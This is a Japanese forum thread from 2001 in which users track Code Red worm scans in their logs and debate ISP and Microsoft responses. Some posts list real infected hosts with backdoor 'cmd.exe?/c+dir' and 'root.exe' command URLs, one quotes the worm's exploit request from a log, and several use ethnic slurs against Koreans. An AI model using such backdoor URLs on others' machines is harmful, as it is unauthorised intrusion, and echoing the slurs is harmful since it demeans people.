- 157 :名無しさん@お腹いっぱい。:2001/08/09(木) 02:01
- Xを送ってきたやつのアドレスアクセスしてたらこれが出てきたけどなんで?
歡迎使用 Microsoft(R) Personal Web Server 4.0
此首頁是置於 Microsoft Personal Web Server (PWS) 4.0 上。PWS 會將執行 Windows(R) 95 或 Windows 98 的任何電腦轉換成 Web 伺服
- 158 :名無しさん@お腹いっぱい。:2001/08/09(木) 02:01
- >>155
そんなところがまだ立ったまま?
- 159 :名無しさん@お腹いっぱい。:2001/08/09(木) 02:04
- >>156
国内は対策が進んで、夕方からの個人ユーザPPP再感染ヤローとしか
思えない同一プロバのがほとんど。
それよか、@niftyつうかppp.infoweb.〜が多いと他プロバの人の愚痴けっこう聞くが。
- 160 :名無しさん@お腹いっぱい。:2001/08/09(木) 02:04
- >>157
head送ってみなよ。そしたら本当のサーバーがわかるから。
- 161 :名無しさん@お腹いっぱい。:2001/08/09(木) 02:04
- 皆さん何で検知してますか?
うちは黒氷です。
- 162 :名無しさん@お腹いっぱい。:2001/08/09(木) 02:06
- >>161
Win: 黒氷
FreeBSD: ppp内蔵パケットフィルタ・・・するとつまんないんでわざわざapacheで観測(藁
- 163 :名無しさん@お腹いっぱい。:2001/08/09(木) 02:07
- Apacheのログでみてる.
俺Plalaなんだが,俺のトコには202.〜が圧倒的に多い
ただ,数はそんなに多くないな.1時間当たり10-20発くらい.
- 164 :名無しさん@お腹いっぱい。:2001/08/09(木) 02:08
- >>159
うちはdionとめたりっくがトップ。
- 165 :名無しさん@お腹いっぱい。:2001/08/09(木) 02:10
- メインはperlスクリプト。4日のX出始めの頃はPacMonProとか
Vigilでダンプ取って調べたりしたけど。そういやSygateも動いてるな
- 166 :名無しさん@お腹いっぱい。:2001/08/09(木) 02:11
- >>163
うちもぷららのフレッツだけどで同じぐらいです。
アドレスは自分と同じ210ばっかし
- 167 :160:2001/08/09(木) 02:13
- 送ったけどなにもかえってこない。
送り方がわるいのかなあ
漏れレベルではちょっと無理という事か
- 168 :名無しさん@お腹いっぱい。:2001/08/09(木) 02:14
- >>158
十Qから逝っになって障害報告がなかなか出なくなった。
会社ぐるみで感染してる当の相手も淫土人なんで逆ギレされても何逝ってるかわかんないだろうし。
- 169 :名無しさん@お腹いっぱい。:2001/08/09(木) 02:15
- いまさらながら第一オクテット、または第一+第二オクテットが同じところに感染を
試みるっていう仕様どおりだね→Xちゃん
- 170 :名無しさん@お腹いっぱい。:2001/08/09(木) 02:15
- >>167
HEADメソッドにレベルも何もないでしょ(w
ただ単に回線いっぱいなんじゃないの?
- 171 :名無しさん@お腹いっぱい。:2001/08/09(木) 02:16
- >>167
telnet 相手のアドレス 80
まじめにリクエスト鬱の面倒。リターンキー適当にうつ
リクエストエラーだけど、HTTPヘッダでバージョンわかるよ。
- 172 :名無しさん@お腹いっぱい。:2001/08/09(木) 02:19
- HEAD / HTTP/1.0[Ctrl+J][Ctrl+M]
- 173 :名無しさん@お腹いっぱい。:2001/08/09(木) 02:20
- HEAD / HTTP/1.0[Ctrl+J][Enter]
じゃないとだめかも
- 174 :名無しさん@お腹いっぱい。:2001/08/09(木) 02:22
- >>173
仕様ではCR+LFなので、逆では。
- 175 :名無しさん@お腹いっぱい。:2001/08/09(木) 02:22
- CRLFを二つ付ければ問題無いだろ
- 176 :名無しさん@お腹いっぱい。:2001/08/09(木) 02:22
- あぁ それで良いのか。。漏れ毎回わざわざ改行コード変えてたよ
- 177 :173:2001/08/09(木) 02:24
- そか、ごめん。
- 178 :157 167:2001/08/09(木) 02:25
- もうつながらなくなっちゃった
先までは80番でESTABになったのに。
パーソナルWEBサーバーの後ろからマスカレードで
赤虫が来てるって事?
>>157
- 179 :名無しさん@お腹いっぱい。:2001/08/09(木) 02:26
- DTIからのアクセスがやむ気配なし。
プロバイダはメールなりでちゃんと告知してんのかな?
- 180 :名無しさん@お腹いっぱい。:2001/08/09(木) 02:26
- 何も考えずEnter 2回でいけないか?
- 181 :名無しさん@お腹いっぱい。:2001/08/09(木) 02:28
- プロバイダにゴルァメール入れたいんだけど
文面どう書けばいいんだろう?
- 182 :157 167:2001/08/09(木) 02:28
- そうか、漏れリターンキーしか押さなかった。
勉強になります
- 183 :名無しさん@お腹いっぱい。:2001/08/09(木) 02:29
- >>180
ターミナルの設定によるけど、それで大体OKだね
- 184 :名無しさん@お腹いっぱい。:2001/08/09(木) 02:29
- >>181
ゴルァ
- 185 :名無しさん@お腹いっぱい。:2001/08/09(木) 02:29
- 100件のうちport111に一件あるだけで他は全てport80って・・
インポウェブが多いよ・・
- 186 :名無しさん@お腹いっぱい。:2001/08/09(木) 02:29
- >>182
2度押した?
- 187 :名無しさん@お腹いっぱい。:2001/08/09(木) 02:35
- >>185
旧infoweb=@nifty 迷惑との情報よく効く (漏れ 旧infoweb (汗
- 188 :157 167:2001/08/09(木) 02:36
- >>186他
いろいろありがとうございます解決しました。
TeraTermだとだめだけどWIN2K純正のやつだったら
できた。でも問題のアドレスは死んじゃったみたいで
元の疑問は闇の中へ・・・
- 189 :名無しさん@お腹いっぱい。:2001/08/09(木) 02:36
- “Code Red” って語源は何?
- 190 :名無しさん@お腹いっぱい。:2001/08/09(木) 02:37
- >>188
TeraTermのデフォルトの改行コードはCRだけだったかな?
CRLFにしてみれ
- 191 :名無しさん@お腹いっぱい。:2001/08/09(木) 02:38
- テレホ連中からのCodeRedアタック、昨日の晩のペース
とちっとも変わらんな。
こりゃホントに収まるのか?
- 192 :185:2001/08/09(木) 02:39
- >>187
つか私もCATV@niftyだったり・・
同じ中で走査されてんのかね
- 193 :名無しさん@お腹いっぱい。:2001/08/09(木) 02:39
- >>189 これ見れ
http://www.zdnet.co.jp/news/0108/04/b_0803_11.html
- 194 :187:2001/08/09(木) 02:42
- >>192
漏れはFlets ADSL
さっきも述べたけど第一オクテット、第一+第二オクテットが同じところに中心的にばら撒くのは
今回の仕様。
- 195 :名無しさん@お腹いっぱい。:2001/08/09(木) 02:43
- なんか中華方面からクレームがきて作ったような話だと
思わないこれ。
もし漏れが見つけたら「午後の紅茶」って名前になってた
ってことかい?
- 196 :189:2001/08/09(木) 02:44
- >>193
おお、ありがと。胸のつかえがおりたよ。
もう思い残すことは無い。
- 197 :名無しさん@お腹いっぱい。:2001/08/09(木) 02:45
- >>191
プロバイダがユーザ任せで、ご家庭ユーザを制御できてないと思われ。
ただ、今回のは期限付きらしいので、10月の頭だか、終りだかに活動停止
=メモリ常駐ワームで24 or 48時間ごとリセットなので実質、終了。
誰か変種作っちゃうと・・・・
もう、こういうもんだと思って使いつづけるか、法制度で強制力持たせないと
どうにもならないね。
- 198 :名無しさん@お腹いっぱい。:2001/08/09(木) 02:45
- >>195
すると俺が見つけたら「JAVA TEA」になってたわけだが、
各所から文句出そうだな(w
- 199 :名無しさん@お腹いっぱい。:2001/08/09(木) 02:46
- 次に見つけるときはドクターペッパーをのんでいて欲しい。
- 200 :名無しさん@お腹いっぱい。:2001/08/09(木) 02:46
- ブラックジンジャーもいいな
- 201 :409:2001/08/09(木) 02:47
- >>194
自分のプロバの対応能力がわかるということか
件数が多い人の入ってるプロバほど糞と・・
>>193
なんかペプシまで憎くなってきたよ
- 202 :名無しさん@お腹いっぱい。:2001/08/09(木) 02:48
- ブラックジンジャーだろう
↓
(゚д゚) ウマー!!
- 203 :名無しさん@お腹いっぱい。:2001/08/09(木) 02:48
- じゃあ缶のしるこ飲みながらウィルス探しに没頭するかな
- 204 :名無しさん@お腹いっぱい。:2001/08/09(木) 02:50
- ネオむぎ茶ってどうよ (プ
- 205 :名無しさん@お腹いっぱい。:2001/08/09(木) 02:50
- >>197
リブート後バックドア全開のまま再感染してIP知らせて回っているのもいるぞ。
- 206 :名無しさん@お腹いっぱい。:2001/08/09(木) 02:51
- >>197
「一般用はプロバイダ側でフィルタリングして一方通行にする事」なんてね
つまんない世の中になりそうだな。
せめて情報公開は免許制にして、無線でゆうアマ免許みたいなのを作って
ほしいな。
- 207 :名無しさん@お腹いっぱい。:2001/08/09(木) 02:51
- 昔にあった「ゴメンね・・・」とかいう炭酸飲料はどうだ?
申し訳なさそうなウィルスで悪い気はしないかも
- 208 :名無しさん@お腹いっぱい。:2001/08/09(木) 02:52
- 変種が出ることは間違いないだろうから、期限付でもまったく楽観できないよなぁ。
このパケットが流れ続けるのが常態化しそう。
- 209 :名無しさん@お腹いっぱい。:2001/08/09(木) 02:53
- 別に飲み物じゃなくても、「ぺヤング食べてました」でもいいじゃん
- 210 :名無しさん@お腹いっぱい。:2001/08/09(木) 02:54
- インターネット全体の慢性的な低速化ですか。
- 211 :名無しさん@お腹いっぱい。:2001/08/09(木) 02:54
- >>206
そして、その免許認定機関には郵政省の天下りが...
って今は郵政省じゃないんだっけ?
- 212 :197:2001/08/09(木) 02:54
- >>206
免許、認可制度はアレなので、簡単な手続きで損害賠償ができるようにする。
諸刃の剣かも・・・
- 213 :名無しさん@お腹いっぱい。:2001/08/09(木) 02:55
- 適当な管理してた管理者だけ罰する法律作ってくれ
- 214 :名無しさん@お腹いっぱい。:2001/08/09(木) 02:55
- 新ウイルス、その名も吉牛(笑)
- 215 :197:2001/08/09(木) 02:55
- >>212
たとえば、プロバとMSは、上限つきでいいから一定の責任をとれということで。
- 216 :名無しさん@お腹いっぱい。:2001/08/09(木) 02:56
- 「ソフトに未チェックのバッファがあったら死刑」
これでいいよ
- 217 :名無しさん@お腹いっぱい。:2001/08/09(木) 02:57
- >>216
殆どの開発者が死刑だ。
- 218 :216:2001/08/09(木) 02:58
- >>217
うん、俺も死刑になるね(w
- 219 :名無しさん@お腹いっぱい。:2001/08/09(木) 02:59
- すまん、俺も死刑かもしれん。
- 220 :名無しさん@お腹いっぱい。:2001/08/09(木) 03:01
- つーか死刑はともかく、明日の仕事がきつくなるだけ
だからもう寝るよ。とりあえず執行猶予をくれ(w
- 221 :名無しさん@お腹いっぱい。:2001/08/09(木) 03:04
- では、今晩はDQN侵入君が現れないことを祈って夢路につこう・・・
- 222 :名無しさん@お腹いっぱい。:2001/08/09(木) 03:05
-
感染シテルやつ みつけたら どう遊んでやるんだ?
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
詳しく教えてくれ。
- 223 :名無しさん@お腹いっぱい。:2001/08/09(木) 03:05
- そんじゃ、俺も寝る。おやすみ。
- 224 :名無しさん@お腹いっぱい。:2001/08/09(木) 03:09
- >>204
2ちゃんでギコネコをコピペしたやつに感染するとか (w
- 225 :名無しさん@お腹いっぱい。:2001/08/09(木) 03:12
- 遅ればせながらスレ立てお疲れさん.>>1
http://www.security.nl/misc/codered-stats/geodist-rcv2.gif
を見ると、Code Red II のみに関してはヨーロッパにその被害
が集中しているように見えるけど、なぜなんだろう。
単なる誤爆なんだろうか・・・
- 226 :名無しさん@お腹いっぱい。:2001/08/09(木) 03:20
- >>225
(1)第一Octetが同じ、または第一・第二Octetが同じところに重点的に感染するから。
(2)さらに、観測点がオランダだから。
- 227 :名無しさん@お腹いっぱい。:2001/08/09(木) 03:25
- >>226
なるほど。要は観測点の問題ですね。
Code Red II の仕様からすると、中国語版OSを使っている可能性
が高い地域をターゲットにするのでは?と思っていたのです。
- 228 :地方CATVユーザ:2001/08/09(木) 03:30
- 全く来なくなったからCATV局側で対策取ったのかと思ったら単にport80塞がれただけだった。
自鯖に外からアクセスできねぇ…。
仕方無いので81で立ち上げ直した。
しょせんCATVか。
- 229 :名無しさん@お腹いっぱい。:2001/08/09(木) 03:35
- インフォスフィアなんだけど、3:15頃からパッタリ止んだ。
- 230 : :2001/08/09(木) 03:37
- カンコックでは官公庁が感染
http://news.yahoo.co.jp/headlines/reu/010807/int/18345001_japan_47407_1.html
激しくwarata
すげーよ。
- 231 :名無しさん@お腹いっぱい。:2001/08/09(木) 03:52
- >>230 の記事
> また、ソウルの官庁間ネットワークのセキュリティーを強化したという。
ま、セキュリティーを強化したなんてことはいうのは簡単だわな。
ネットワークに接続しないでスタンドアロンで使う分には、誰にも
迷惑かけないんだからさ〜、そうしとけって。
- 232 :名無しさん@お腹いっぱい。:2001/08/09(木) 05:02
- つーか日本の場合はCodeRedすら見向きもされないほど遅れていると思われ
- 233 :名無し:2001/08/09(木) 05:13
- ところで 感染した側には、こちらのdefault.idaが渡るのかな?
逝ってヨシのAAを入れたおいたのですが。
アパッチサーバーは、"GET def..." 200 をLOGに残しています。
- 234 :keniti:2001/08/09(木) 05:22
- BlackIce + Apacheで監視してます。
CodeRed来ると、ずっとエラーコードが404だったのに
なんか突然200返した。なぜ?
BlackIceで赤ビックリついたのでかなりビビッタのですが。
- 235 :名無しさん@お腹いっぱい。:2001/08/09(木) 05:46
- >>233
ブー。スレ内1〜4にあるSecurity Focusのレポートに詳しいですから読みましょう。
- 236 :255:2001/08/09(木) 05:54
- >>233
すまん、意図を取り違えた。
自分の用意した/default.idaは、「アクセスしてきた感染サーバ」への応答に
わたるかもしれんが、当然、誰も読まない(藁
- 237 :235=236:2001/08/09(木) 05:54
- 未来を指してしまった。鬱出し脳・・・
- 238 :名無しさん@お腹いっぱい。:2001/08/09(木) 06:14
- NHKでちょっとやってた>コード・レッド
- 239 :名無しさん@お腹いっぱい。:2001/08/09(木) 06:17
- 漏れも見た、感染した会社は不正アクセス防止法に引っかかるって言ってたね。
- 240 :名無しさん@お腹いっぱい。:2001/08/09(木) 06:30
- >239
> 感染した会社は不正アクセス防止法に引っかかるって言ってたね。
マジで?それはなんか違うような・・・
それを言ったら、今回の CodeRed に限らず、今までにあったワームや
メールを介するウィルスなんかに感染した会社も対象にせなあかんねぇ。
- 241 :ハハハ…:2001/08/09(木) 06:35
- ニュースでやってた。国内200台のサーバが感染だってさ
- 242 :名無しさん@お腹いっぱい。:2001/08/09(木) 06:37
- 無線は、傍受するだけなら合法なのにね。
- 243 :名無しさん@お腹いっぱい。 :2001/08/09(木) 06:53
- @NIFTYで接続しているので、ここからのが圧倒的に多いのでセンター宛に連絡も何の反応も無し。
1件づつ潰すのは大変だろうけど、せめて契約者に警告のメールくらい流しても良さそうな物だと思う。
JPCERTからのインフォメーションも出ているが、パッチも当てずに放置している連中が見ているとは思えないから、プロバイダからも流すべきだと思うんだけど。
- 244 :名無しさん@お腹いっぱい。:2001/08/09(木) 07:09
- うちもニフティ。
7日付で警告でてたけどトップページに載せるかメールで喚起しないと意味な〜い。
会員に直接警告するのはプロバにしかできないからねえ。
放置連中にping打ちまくったら気がつくかな..
- 245 : :2001/08/09(木) 07:12
- この際バカから罰金とって
ネットワークに役立てよう
- 246 :名無しさん@お腹いっぱい。:2001/08/09(木) 07:12
- >>241
200台って、ウチのマシンノックしたのが 200 台くらいだよ (藁
- 247 :名無しさん@お腹いっぱい。:2001/08/09(木) 07:39
- >>241
うーん少なくとも 61で始まる国内だけで50近く確認しているんだが
最低でも 1000以上はあるはず
- 248 :え〜ん:2001/08/09(木) 07:41
- おはよう
- 249 :名無しさん@お腹いっぱい。:2001/08/09(木) 07:41
- これって感染PCの遊び方だろ?
http://210.119.33.149/c/winnt/system32/cmd.exe?/c+dir
http://210.220.214.233/c/winnt/system32/cmd.exe?/c+dir
http://210.21.31.181/c/winnt/system32/cmd.exe?/c+dir
http://210.207.36.10/c/winnt/system32/cmd.exe?/c+dir
http://210.91.104.12/c/winnt/system32/cmd.exe?/c+dir
http://210.120.24.191/c/winnt/system32/cmd.exe?/c+dir
http://210.85.108.97/c/winnt/system32/cmd.exe?/c+dir
http://210.91.80.129/c/winnt/system32/cmd.exe?/c+dir
http://210.220.217.151/c/winnt/system32/cmd.exe?/c+dir
http://210.96.195.167/c/winnt/system32/cmd.exe?/c+dir
- 250 :名無しさん@お腹いっぱい。:2001/08/09(木) 07:46
- >> 246
うちは、もう 1301 回 もノックされてます :(
- 251 :名無しさん@お腹いっぱい。:2001/08/09(木) 07:53
- すげー『トントン 開いてますか』が13010回
- 252 :名無しさん@お腹いっぱい。:2001/08/09(木) 08:03
- >>246
警察庁のとこの鯖に来たのが200件なんだそうな。
んで国内感染200台以上って発表したんだそうな。
共同通信系列の朝刊にのってると思う。
WEB上で該当記事は見つからなかった。
- 253 :名無しさん@お腹いっぱい。:2001/08/09(木) 08:11
- NNNタイプはXXXの1/10程度だけど散見するね
XXXは61.*.*.* (うちはAsahi-Net)ばっかりだけどNNNは210が多いかな
一時期に比べたら減ったけど10分に一回くらいやってくる
- 254 :え〜ん:2001/08/09(木) 08:38
- やっぱうちのログにどさくさにまぎれてFTPにアノニ試したやついるよ。
別ファイルに逝けるか試してやんの。
- 255 :名無しさん@お腹いっぱい。:2001/08/09(木) 08:44
- >>249 もう秋田。次回はデリとか企業か政府機関にしてくれ。
- 256 :名無し:2001/08/09(木) 08:45
- 8/8の結果
722匹 すべてX うち24件日本、内1件営業サーバー、台湾6件、1件営業サーバー、残りはすべて糞チョソ。
ちなみにこちらは IP 211.*.*.*
- 257 :え〜ん:2001/08/09(木) 08:48
- うちのメールサーバーtelnetでつなぐとバージョン答えるんだよね。
どうにかならんかな。
- 258 :名無しさん@お腹いっぱい。:2001/08/09(木) 09:02
- >>229
Infosphereなら俺が2回ほどゴルァした。ちっとは効果あったんか?
ここから1日60回以上ノックされてた。次に多いのはPlala。
- 259 :名無しさん@お腹いっぱい。:2001/08/09(木) 09:18
- http://www.microsoft.com/japan/
のトップに案内が出ている。遅いって。
こういう事態になってしまったら一般マスコミも使って
告知するべきだと思うぞ、MSは。
- 260 :名無しさん@お腹いっぱい。:2001/08/09(木) 09:19
- >>257
Linux nara ipchains or iptables de
filtering sureba?
ipchains -A input -s ! 192.168.0.0 -d 0/0 23 -l -j DENY
Nazeka Canna ga tatanai. romaji sumaso.
- 261 :名無しさん@お腹いっぱい。:2001/08/09(木) 09:22
- >>259
IIS4.0とIIS5.0を・・だけでいいんですか、ほう〜
- 262 :名無し:2001/08/09(木) 09:25
- 前スレにあった 海底ケーブル切断のAAは、面白かった(W
- 263 :え〜ん:2001/08/09(木) 09:27
- >>260
arigatou
Linux zyanainndesuyo W2Kde WWW to FTP to mail betubetuno
sofuto wo tatetemasu.
- 264 :名無しさん@お腹いっぱい。:2001/08/09(木) 09:30
- >>261
俺も気になったよ。
特に Win2K Pro ユーザーが、自分の PC で IIS 動いてること
気づいてないこと多いから文面直してくれ、と Feedback のページ
で送っておいた。
http://www.microsoft.com/japan/feedback/
これからMSに電話でも申し入れときます。
- 265 :え〜ん:2001/08/09(木) 09:35
- w2kってついこの前300万本出荷だっけ?
>>261
あれではだれもクリックしないな。
鯖屋はTOP見ないし。
- 266 :え〜ん:2001/08/09(木) 09:39
- さて納品いくよ、お後よろしく
- 267 :名無しさん@お腹いっぱい。:2001/08/09(木) 09:45
- カンコックなんかにはメールしてるの?>ALL
- 268 :名無しさん@お腹いっぱい。 :2001/08/09(木) 09:53
- 韓国のIIS鯖管理者は何やってんだ
- 269 :名無しさん@お腹いっぱい。:2001/08/09(木) 09:55
- キムチくってるニダ
- 270 :名無しさん@お腹いっぱい。:2001/08/09(木) 09:57
-
�$B!c%^%$%/%m%=%U%H�(BIIS�$B%;%-%e%j%F%#>pJs%;%s%?!<!d�(B
Tel�$B!'�(B0120-69-0196
�$B1D6H;~4V!'�(B24�$B;~4V�(B
- 271 :名無しさん@お腹いっぱい。:2001/08/09(木) 09:58
- <マイクロソフトIISセキュリティ情報センター>
Tel:0120-69-0196
営業時間:24時間
- 272 :名無しさん@お腹いっぱい。:2001/08/09(木) 10:11
- >>112
sun-starうちにもきたよ。でも歯磨き会社じゃなくて、管理者責任者名がぜんぶ中華系のシステム屋(プだった。
- 273 :名無しさん@お腹いっぱい。:2001/08/09(木) 10:16
- 同じサーバから一分間に5回もアタックがあるのはどういう事かね?
- 274 :名無しさん@お腹いっぱい。:2001/08/09(木) 10:19
- >>273 律儀に串経由してんじゃねーの (藁
- 275 :名無しさん@お腹いっぱい。:2001/08/09(木) 10:25
- ただいまマレーシアからいらっしゃいました。
東南アジアにも広まりつつある模様。
- 276 :名無しさん@お腹いっぱい。:2001/08/09(木) 11:11
- http://dhcp-****.nava21.ne.jp/scripts/root.exe?/c+dir+"c:\必ず読んでくださいね!\"
これワラタ
Directory of c:\必ず読んでくださいね!
2001/08/08 12:11p <DIR> .
2001/08/08 12:11p <DIR> ..
2001/08/08 12:10p <DIR> このマシンはCodeRedに感染しています
2001/08/08 12:10p <DIR> 感染してると外部からこ〜んな事も出来ちゃいます
2001/08/08 12:11p <DIR> 早急に対処した方がいいですよ〜!
0 File(s) 0 bytes
5 Dir(s) 2,242,801,664 bytes free
親切な人だぁ
- 277 :あげ」:2001/08/09(木) 11:16
- 拝啓
Windowsのサーバ管理者の皆様
私はFreeBSDにてサーバを構築しております山本と申
します。
Code Redからの大量アクセスありがとうございます。
お蔭様で回線が非常に遅くなり、私用、公用共に
非常に支障をきたしております。
そこでお願いがあります。
即刻回線を切断するか、PC-UNIXに乗り換えてください。
MS製品はインターネットに向きません。
- 278 :名無しさん@お腹いっぱい。:2001/08/09(木) 11:17
- >>267
してない
カンコックの人には面倒なもんで(藁
- 279 :質問:2001/08/09(木) 11:23
- ここのすれは、Win信者いるか?
- 280 :名無しさん@お腹いっぱい。:2001/08/09(木) 11:26
- いまログ確認してたらこんなの発見。
138.87.*.* - - [09/Aug/2001:05:05:42 +0900] "GET /default.ida?NN(中略)NN
%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 328
whoisの結果
Illinois State University (NET-ILSTU)
3500 Telecommunications
Normal, IL 61790-3500
US
Netname: ILSTU
Netblock: 138.87.0.0 - 138.87.255.255
Coordinator:
Telecommunications (TE-ORG-ARIN) i-admin@MAIL.TEL.ILSTU.EDU
(309) 438-8731
Fax- (309) 438-8755
Domain System inverse mapping provided by:
OSIRIS.ILSTU.EDU 138.87.4.1
ISIS.ILSTU.EDU 138.87.110.1
Record last updated on 28-Jan-1999.
Database last updated on 7-Aug-2001 23:06:08 EDT.
イリノイ州立大学、新しいサーバ立ち上げた途端に感染したんだろうか?
- 281 :名無しさん@お腹いっぱい。:2001/08/09(木) 11:27
- >>277
connect24h からのコピペ。
それとも向こうで叩かれたから逃げてきたの?(藁
- 282 :あげ」:2001/08/09(木) 11:29
- >>281
いや、勝利のおたげび参りました。
Windows管理者駆逐
- 283 :( ´Д`):2001/08/09(木) 11:30
- がいしゅつかもしれんけど会社についてメールをチェックしたら
M$からCodeRedに関するメールが来てたよ。
>Code Red ワームに対するマイクロソフト製オペレーティングシステムの
>セキュリティ対策の確認および徹底に関するお願い
おせーよ!!
- 284 :名無しさん@お腹いっぱい。:2001/08/09(木) 11:32
- >>282 ?x0028;?xff9f;?x0414;?xff9f;?x0029;?xff8a;?xff67;?x003f;
- 285 :名無しさん@お腹いっぱい。:2001/08/09(木) 11:36
- >>277
んで Windows 管理は Windows オタクにしかムリとか言うんだろ。
安心しろ。お前には UNIX も Windows もムリだ(w
- 286 :名無しさん@お腹いっぱい。:2001/08/09(木) 11:40
- まずは手紙の書き方からだな・・・
- 287 :名無しさん@お腹いっぱい。:2001/08/09(木) 11:40
- Macでサーバ構築してますが何か?
- 288 :名無しさん@お腹いっぱい。:2001/08/09(木) 11:43
- >>287
WebSTARのログに出てる?>default.ida
俺のところのLinux-Apacheは出ても、WebSTARのログには痕跡無し。
- 289 :名無しさん@お腹いっぱい。:2001/08/09(木) 11:45
- ADSL で 211.* のIPアドレスが割り当てられてたときは、
Code Red が1日で750〜900回ぐらい来てたけど、
接続しなおして 61.* になったら200以下になった(藁。
- 290 :名無しさん@お腹いっぱい。:2001/08/09(木) 11:46
- >>288
出てるよ。
今日の午前0時からだとだいたい130回ぐらいアタックがある。
ちなみにWebSTARじゃなくてOS標準のWeb共有(笑
ヘボいですか?
- 291 :名無しさん@お腹いっぱい。:2001/08/09(木) 11:46
- ウチに来たco.jpのぶんはメール送ったんだけど、
そのうちの一社は
、
『ウチの会社、及びそのサーバーはWindous系とIISは使っておりません。
また、送信logにもそちらのIPは記録されておりませんが。』
って返事が返ってきたんだけど、これって偽装されてたってこと?
あまりの多さにそのlog消しちゃったんで検証のしようがないけど。
- 292 :あげ」:2001/08/09(木) 11:47
-
今回のCodeRedの件でびっくりしたこと。
・Winサーバが日本にあまりに多いこと。
・Winサーバ管理者は無知が多いので被害が増大してい
ること。これに彼らは気づいていないこと。
・Winサーバを立てても悪びれもしない人があまりに多い
こと。
・Winは新参者のくせにでかい態度を取る輩が多いこと。
Winがインターネットに参入しなかったら。
・UNIX管理者は最新の注意を払う人が多いので、CodeRedと
同等のウイルスが発生しても、ここまで広がらなかったは
ず。
・馬鹿な常識が蔓延しなかったはず。
- 293 :288:2001/08/09(木) 11:48
- >>290
そうなんだ。
バーチャルでもIP振ってれば、出るよね普通。
- 294 :名無しさん@お腹いっぱい。:2001/08/09(木) 11:48
- >>291
その会社、外に開いてる串あるんじゃないか?(藁
しかしCode redが串使うかは謎だな。
- 295 :名無しさん@お腹いっぱい。:2001/08/09(木) 11:49
- >>292
Internet Wormって知ってる?
- 296 :名無しさん@お腹いっぱい。:2001/08/09(木) 11:50
- >>292 ハイハイ。あんたはBSD使ってて良かったね。
バックドア突いてIIS落として回るなり好きにしたら?
- 297 :名無しさん@お腹いっぱい。:2001/08/09(木) 11:54
- >>292
connect24h で叩かれたからここに来るのカコワルイ
- 298 :あげ」:2001/08/09(木) 11:54
- Win管理者は中村正三郎から勉強し直すことをお勧めします。ぷっ
- 299 :あげ」:2001/08/09(木) 11:54
- >>297
こんな板で半角カタカナカコワルイ
- 300 :名無しさん@お腹いっぱい。:2001/08/09(木) 11:56
- CodeRedのコードを利用して、感染してるIISサーバ自体を
HALT状態には出来ないかな?
サーバ停止したら困るだろうけど、この状態が収まらないのも困る。
- 301 :名無しさん@お腹いっぱい。:2001/08/09(木) 11:57
- 勝手にIISをインストールするアプリは
具体的にどんなのがありますか?
- 302 :名無しさん@お腹いっぱい。:2001/08/09(木) 11:58
- >>300
止めたほうがいい。前スレで散々既出。
- 303 :名無しさん@お腹いっぱい。:2001/08/09(木) 11:58
- >>294
一応、社内のは全部チェックしてくれたみたいよ。
あと、前スレで串経由もあるってlogがあったね。
- 304 :名無しさん@お腹いっぱい。:2001/08/09(木) 12:02
- infospereなんかウチに来た分のlog送ってやっても
なんの音沙汰も無しだしなぁ。
- 305 :名無しさん@お腹いっぱい。:2001/08/09(木) 12:06
- >>301
手元で検証できないんでよくわからないのだが、
http://www.microsoft.com/japan/technet/security/codeptch.asp#target
ではないだろうか?
- 306 :名無しさん@お腹いっぱい。:2001/08/09(木) 12:07
- 61.152.193.51
10:15からわずか一分の間に30発!!
こんなパターン初めてだ
- 307 :名無しさん@お腹いっぱい。:2001/08/09(木) 12:08
- >>306 よくある。うちは32連発来たことあるぞ。
- 308 :304:2001/08/09(木) 12:08
- hが抜けてた。infosphereね。
- 309 :名無しさん@お腹いっぱい。:2001/08/09(木) 12:08
- 中国:反米感情が強く国家推奨OSがlinaxなので大した被害はない
台湾:中国語環境?のため600発撃ちまくるので超迷惑
韓国:台湾と61や211などを共有し、インフラが整ってるのでボロボロ
日本:(゚д゚)!!
こんな感じでしょうか?
- 310 :あげ」:2001/08/09(木) 12:09
- >>309
"linax" ぷっ
- 311 :ぷぷっ:2001/08/09(木) 12:10
- いーな
LINAX
- 312 :あげ」:2001/08/09(木) 12:12
- >>309
昔は「リヌクス」って発音してたの知ってるか?
それをWin馬鹿が「リナックス」っていいまくって
人数が多いもんだから定着したんだよ。
ったくろくなことしないよ、Win信者。
- 313 :名無しさん@お腹いっぱい。:2001/08/09(木) 12:13
- "linux" ぽっ
- 314 :名無しさん@お腹いっぱい。:2001/08/09(木) 12:14
- 落ちまくってた INTERLINK は復活してきたみたいだね
http://www.interlink.or.jp/notification/backno/2001/info009.html
- 315 :名無しさん@お腹いっぱい。:2001/08/09(木) 12:15
- イパーイ引っかかるけどね
http://www.google.com/search?hl=ja&safe=off&q=linax&lr=lang_ja
- 316 :あげ」:2001/08/09(木) 12:17
- まあ、今回の件でプロバイダはWinサーバを
信用しなくなったのは事実です。
固定アドレス提供しているところなんて、
個人サーバ立てる時はWinは駄目ーーー
って事になってくれるとうれしいなあ、、ぽっ
- 317 :名無しさん@お腹いっぱい。:2001/08/09(木) 12:18
- >>148
CodeRedが活動した際にでた不達のIPアドレスをARPで解決しようとしていると思われ。
しかしCATVではネトワーク設計がおかしいのか関係ないセグメントのARPまでが転送されまくってて
大変なことになっているよう。鬱氏。
- 318 :名無しさん@お腹いっぱい。:2001/08/09(木) 12:20
- >>310=312=316
いちいちスレ汚すな。Win の悪口は
http://www.microsoft.com/japan/customer/information/phone.htm
ここにでも電話して一人でわめいてろ。
ったく厨房はこれだから...
- 319 :名無しさん@お腹いっぱい。:2001/08/09(木) 12:20
- >>304
ログ見てる限り今のところゴルァ全然効いてねえなInfosphere。
ていうか俺の知る限り大体同じ地域から来てるから、ユーザの特定
かなり簡単だと思うんだけど。
今InfosphereのADSLで岡山と長崎から繋いでる奴、お願いだから気付
いてくれ…ノックされまくってんだよ…。
- 320 :名無しさん@お腹いっぱい。:2001/08/09(木) 12:20
- 正:inax
- 321 :名無しさん@お腹いっぱい。:2001/08/09(木) 12:22
- >>320 ワラタ
- 322 :あげ」:2001/08/09(木) 12:23
- >>318
おまえは"linax"だな。ぷっ
- 323 :名無しさん@お腹いっぱい。:2001/08/09(木) 12:25
- cse7-**.osaka.mbn.or.jpさん、気付いてよぉ
- 324 :名無しさん@お腹いっぱい。:2001/08/09(木) 12:27
- 自動連絡モジュール
http://reuven.lerner.co.il/projects/Apache-CodeRed-1.07.tar.gz
